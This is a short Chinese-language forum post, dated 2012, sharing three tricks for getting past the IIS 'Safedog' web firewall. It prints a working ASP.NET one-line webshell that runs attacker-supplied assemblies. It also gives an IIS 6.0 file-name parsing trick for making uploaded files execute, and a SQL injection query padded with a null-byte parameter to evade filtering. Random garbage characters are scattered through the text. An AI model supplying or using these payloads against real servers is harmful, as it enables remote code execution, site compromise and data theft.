1、绕过IIS安全狗的一句话。4 \# D# ?* I! ~7 q
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。) y8 m) g G3 l1 X
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
% g# u* p. s; m1 y5 o9 @) n, s3 x6 ~
3 j( e6 e! h- T2 x% p2、IIS6.0解析漏洞遇到安全狗。7 }# ], y; ]' A$ X5 x+ k+ b: Q
文件名为
& N* b1 d/ f( Y0 Thttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
) D) ^- K; {- ]) b
# G5 L! U- L( }3 a; K; D, {- |这样的会被IIS安全狗果断屏蔽。) ]/ G9 P: a, R8 z8 t+ _/ i3 R
改成如下名称,IIS6一样会解析:% I: H$ I6 U. D# e; F% G
www.xxxxx.com/;1.asp;1.jpg
" r* q. V/ h1 {* _6 n% A% R# s8 W) k( o0 }# u0 l# a5 C
3、安全狗的注入绕过。+ x% k# x. X5 P4 z
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。3 e2 c7 h0 i+ J4 b8 {' K* V
但如果:* l6 m! D W5 a0 G3 q
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1( ^/ e/ {- v+ N1 q! _
就可以成功绕过了。
" {& H) j- M# t& g) S1 ^
: H g0 N, O$ ~2 P
7 x9 `8 P4 B K |
发表于 2012-10-31 08:25:30
收藏
支持
反对